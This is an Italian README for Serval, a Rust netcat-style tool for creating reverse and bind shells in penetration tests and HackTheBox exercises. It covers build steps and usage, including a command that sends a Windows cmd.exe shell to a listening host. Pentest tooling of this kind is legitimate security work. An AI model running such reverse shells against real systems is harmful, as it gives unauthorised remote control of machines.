
Una backdoor in stile Netcat per pentesting ed esercitazioni di pentest.
Serval è un binario leggero e facile da usare per generare shell reverse e bind per pentest o esercizi di test di penetrazione. Serval è multipiattaforma e può essere compilato sia per Windows a 32 e 64 bit che per Linux a 32 e 64 bit. Nota: Grazie alla flessibilità di Rust potrebbe essere possibile compilare per altre piattaforme (come ARM) ma non le ho testate.
Ho sviluppato Serval per eliminare la mia dipendenza da netcat durante le sfide HacktheBox, poiché può essere fastidioso trovare binari netcat per Windows (soprattutto con l'opzione -e) ed è ancora più difficile trovare un binario da una fonte affidabile.
Scarica il sorgente da github
git clone https://github.com/tgadola/serval.git && cd serval-master
*Opzionale: Modifica il file di build in .cargo/config per riscrivere il tuo percorso di build.
Compila il binario per la tua piattaforma corrente.
cargo build --release
*Nota: v1.1.0 richiede Rust nightly
Puoi compilare per altre piattaforme usando
cargo build --release --target <target-triple>
Se sei un individuo particolarmente fiducioso puoi scaricare i binari precompilati qui.
Per impostazione predefinita, Serval ascolterà o si collegherà a una porta e reindirizzerà l'input e l'output standard a tale connessione. Il flag -e genererà un processo e reindirizzerà il suo input e output standard attraverso la rete.
Serval ascolta su tutte le interfacce.
Usa il flag -H per attivare le funzionalità di modifica della riga e cronologia dei comandi!
serval -l 4400 -H
serval.exe <listening ip> <listening port> -q -e cmd.exe
Un grande ringraziamento a @kkawakam-transferwise e al loro crate Rustyline, che fa letteralmente tutto il lavoro pesante. Dai un'occhiata a Rustyline!
Grazie ai creatori e contributori di Clap! Dai un'occhiata a Clap.
Grazie ai creatori e contributori di Anyhow! Dai un'occhiata a Anyhow. +1 per il grande nome del crate.
Grazie a @jaynus per tutti i suoi consigli su Rust
Apache 2.0. Vedi il file di Licenza per maggiori informazioni.